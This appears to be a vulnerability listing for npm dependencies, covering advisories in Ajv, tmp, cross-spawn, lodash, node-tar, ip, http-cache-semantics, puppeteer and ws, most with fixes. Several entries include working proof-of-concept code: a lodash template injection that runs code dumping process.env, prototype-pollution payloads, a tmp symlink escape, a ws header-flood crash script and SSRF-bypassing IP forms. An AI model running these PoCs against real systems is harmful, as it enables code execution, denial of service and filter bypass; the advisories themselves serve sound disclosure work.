All vulnerabilities related to version 2.0.1 of the package
Prototype Pollution in Ajv
An issue was discovered in ajv.validate() in Ajv (aka Another JSON Schema Validator) 6.12.2. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. (While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.)
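As a generic, hedged illustration of the prototype-pollution class (this is deliberately not the Ajv-specific schema payload): a naive recursive merge that copies a __proto__ key ends up writing attacker-controlled properties onto Object.prototype.
// Generic prototype pollution sketch -- NOT the Ajv exploit payload.
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (source[key] && typeof source[key] === 'object') {
      // Accessing target['__proto__'] yields Object.prototype, so the recursion
      // below writes attacker-controlled properties onto every object.
      if (!target[key]) target[key] = {};
      naiveMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

const untrusted = JSON.parse('{"__proto__": {"isAdmin": true}}');
naiveMerge({}, untrusted);
console.log({}.isAdmin); // true -- the property now appears on all objects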
tmp allows arbitrary temporary file / directory write via symbolic link dir parameter
tmp@0.2.3 is vulnerable to an arbitrary temporary file / directory write via a symbolic link passed as the dir parameter.
According to the documentation, there are some conditions that must hold:
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because _resolvePath does not properly handle symbolic links when resolving paths:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
  if (name.startsWith(tmpDir)) {
    return path.resolve(name);
  } else {
    return path.resolve(path.join(tmpDir, name));
  }
}
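Note (not part of the advisory): path.resolve works purely on the path string and never touches the file system, so a symlink is left unfollowed; fs.realpathSync is what actually resolves it. Assuming the symlink created in the PoC below (/tmp/evil-dir -> $HOME/mydir1):
// path.resolve vs fs.realpathSync with a symlinked directory (illustrative sketch)
const path = require('path');
const fs = require('fs');

console.log(path.resolve('/tmp/evil-dir'));
// -> '/tmp/evil-dir' (lexical resolution only; still startsWith('/tmp'), so the check passes)

console.log(fs.realpathSync('/tmp/evil-dir'));
// -> '/home/user/mydir1' (the real target, outside the tmpDir)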
If the dir parameter points to a symlink that resolves to a folder outside the tmpDir, it's possible to bypass the _assertIsRelative check used in _assertAndSanitizeOptions:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
  if (option === 'name') {
    // assert that name is not absolute and does not contain a path
    if (path.isAbsolute(name))
      throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
    // must not fail on valid .<name> or ..<name> or similar such constructs
    let basename = path.basename(name);
    if (basename === '..' || basename === '.' || basename !== name)
      throw new Error(`${option} option must not contain a path, found "${name}".`);
  }
  else { // if (option === 'dir' || option === 'template') {
    // assert that dir or template are relative to tmpDir
    if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
    }
    let resolvedPath = _resolvePath(name, tmpDir); //<---
    if (!resolvedPath.startsWith(tmpDir))
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
  }
}
The following PoC demonstrates how writing a tmp file to a folder outside the tmpDir is possible.
Tested on a Linux machine.
Setup: create a folder in the home directory and a symlink inside the tmpDir that points to a directory outside of it:
mkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
ls -lha $HOME/mydir1 | grep "tmp-"
node main.js
File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
$HOME/mydir1 (outside the tmpDir):
ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]
main.js:
// npm i tmp@0.2.3
const tmp = require('tmp');

const tmpobj = tmp.fileSync({ 'dir': 'evil-dir' });
console.log('File: ', tmpobj.name);

try {
  tmp.fileSync({ 'dir': 'mydir1' });
} catch (err) {
  console.log('test 1:', err.message);
}

try {
  tmp.fileSync({ 'dir': '/foo' });
} catch (err) {
  console.log('test 2:', err.message);
}

try {
  const fs = require('node:fs');
  const resolved = fs.realpathSync('/tmp/evil-dir');
  tmp.fileSync({ 'dir': resolved });
} catch (err) {
  console.log('test 3:', err.message);
}
A potential fix could be to call fs.realpathSync (or similar), which also resolves symbolic links:
function _resolvePath(name, tmpDir) {
  let resolvedPath;
  if (name.startsWith(tmpDir)) {
    resolvedPath = path.resolve(name);
  } else {
    resolvedPath = path.resolve(path.join(tmpDir, name));
  }
  return fs.realpathSync(resolvedPath);
}
Arbitrary temporary file / directory write via symlink
Regular Expression Denial of Service (ReDoS) in cross-spawn
Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase CPU usage and crash the program by supplying a very large, specially crafted string.
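As a generic illustration of the ReDoS class (this is not the actual regular expression used inside cross-spawn), a pattern with nested quantifiers backtracks catastrophically on a long, almost-matching input:
// Generic ReDoS sketch -- NOT the regex from cross-spawn.
const evil = /^(a+)+$/;               // nested quantifiers
const input = 'a'.repeat(40) + '!';   // long input that almost matches

console.time('redos');
evil.test(input);                     // spends a long time backtracking before returning false
console.timeEnd('redos');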
Command Injection in lodash
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
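A widely cited proof of concept for this issue abuses the template function's variable option, which in vulnerable versions was interpolated into the compiled function source without sanitization (assumed to be reproducible only on lodash < 4.17.21):
// PoC circulated with the advisory; only works on lodash < 4.17.21.
const _ = require('lodash');

// The attacker-controlled `variable` option breaks out of the generated
// `function(<variable>) { ... }` source and injects arbitrary code, which
// runs when the compiled template is called.
_.template('', { variable: '){console.log(process.env)}; with(obj' })();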
Prototype Pollution in lodash
Versions of lodash before 4.17.11 are vulnerable to prototype pollution.
The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.11 or later.
Prototype Pollution in lodash
Versions of lodash before 4.17.5 are vulnerable to prototype pollution.
The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via __proto__ causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.5 or later.
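As an illustration of the __proto__ vector described above, the classic proof of concept (only effective against a vulnerable release, here lodash < 4.17.5) is:
// Only pollutes on vulnerable lodash versions (< 4.17.5 for this vector).
const _ = require('lodash');

const payload = '{"__proto__": {"polluted": true}}';
_.merge({}, JSON.parse(payload));   // JSON.parse keeps __proto__ as an own key

console.log({}.polluted);           // true on vulnerable versions, undefined on fixed ones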
Prototype Pollution in lodash
Versions of lodash before 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep allows a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.12 or later.
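Similarly, for the constructor.prototype vector in the lodash entry above, the commonly cited proof of concept (only effective on lodash < 4.17.12) is:
// Only pollutes on lodash < 4.17.12.
const _ = require('lodash');

const payload = '{"constructor": {"prototype": {"isAdmin": true}}}';
_.defaultsDeep({}, JSON.parse(payload));

console.log({}.isAdmin);   // true on vulnerable versions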
Denial of service while parsing a tar file due to lack of folders count validation
During some analysis of npm's node-tar package, I came across the folder creation process. Basically, if you provide node-tar with a path like ./a/b/c/foo.txt, it creates every folder and sub-folder (a, b, and c) until it reaches the last folder and creates foo.txt. I noticed that there is no validation at all on the number of folders being created, which means an attacker can consume the CPU and memory of the system running node-tar and even crash the Node.js client within a few seconds, using a path with too many sub-folders inside.
You can reproduce this issue by downloading the tar file I provided in the resources and using node-tar to extract it; you should get the same behavior as in the video.
Here's a video showcasing the exploit:
Denial of service by crashing the Node.js client when attempting to parse a tar archive, making it run out of heap memory and consuming server CPU and memory resources.
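A possible caller-side mitigation, not part of the original report and assuming extraction goes through node-tar's high-level API, is to reject entries with excessively deep paths via the filter option of tar.x:
// Caller-side mitigation sketch: cap the directory depth of extracted entries.
const tar = require('tar');

const MAX_DEPTH = 32; // assumption: a depth limit suitable for your archives

tar.x({
  file: 'untrusted.tar',
  cwd: './output',
  // Entries returning false are skipped instead of being unpacked.
  filter: (entryPath) => entryPath.split('/').length <= MAX_DEPTH,
}).then(() => console.log('done'));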
This issue was originally reported to the GitHub bug bounty program; they asked me to report it to you a month ago.
ip SSRF improper categorization in isPublic
The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282.
NPM IP package incorrectly identifies some private IP addresses as public
The isPublic() function in the NPM package ip doesn't correctly identify certain private IP addresses in uncommon formats such as 0x7F.1 as private. Instead, it reports them as public by returning true. This can lead to security issues such as Server-Side Request Forgery (SSRF) if isPublic() is used to protect sensitive code paths when passed user input. Versions 1.1.9 and 2.0.1 fix the issue.
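To illustrate, here is a small sketch using the example addresses quoted in the two advisories above (behavior assumed for vulnerable releases, i.e. ip 2.0.1 and earlier / before 1.1.9):
// On vulnerable versions, isPublic() returns true for these loopback/private forms.
const ip = require('ip');

const samples = ['127.1', '0x7F.1', '012.1.2.3', '000:0:0000::01', '::fFFf:127.0.0.1'];
for (const addr of samples) {
  console.log(addr, '->', ip.isPublic(addr));
}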
http-cache-semantics vulnerable to Regular Expression Denial of Service
http-cache-semantics contains an inefficient regular expression, leading to denial of service. This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.
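A minimal sketch of that attack surface, assuming the server builds a CachePolicy from the incoming request so the attacker controls the header values being parsed:
// Sketch: header values from the incoming request are parsed by CachePolicy.
// In versions < 4.1.1, a crafted cache-control value could trigger excessive
// regex backtracking during that parsing.
const CachePolicy = require('http-cache-semantics');

const incomingRequest = {
  url: '/resource',
  method: 'GET',
  headers: {
    'cache-control': 'max-age=3600', // attacker-controlled value in practice
  },
};

const upstreamResponse = {
  status: 200,
  headers: { 'cache-control': 'public, max-age=7200' },
};

const policy = new CachePolicy(incomingRequest, upstreamResponse); // parsing happens here
console.log(policy.storable());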
Use-After-Free in puppeteer
Versions of puppeteer prior to 1.13.0 are vulnerable to the Use-After-Free vulnerability in Chromium (CVE-2019-5786). The Chromium FileReader API is vulnerable to Use-After-Free which may lead to Remote Code Execution.
Upgrade to version 1.13.0 or later.
ws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server. Proof of concept:
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)
In vulnerable versions of ws, the issue can be mitigated in the following ways:
- Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
- Set server.maxHeadersCount to 0 so that no limit is applied.
The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.
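As a minimal sketch of the second mitigation (assuming the ws server is attached to an HTTP server you control):
// Mitigation sketch for vulnerable ws versions: disable the header-count limit
// on the HTTP server that ws is attached to (option 2 above).
const http = require('http');
const WebSocket = require('ws');

const server = http.createServer();
server.maxHeadersCount = 0; // 0 means "no limit", so the crash condition is never reached

const wss = new WebSocket.Server({ server });
wss.on('connection', (socket) => socket.send('hello'));

server.listen(8080);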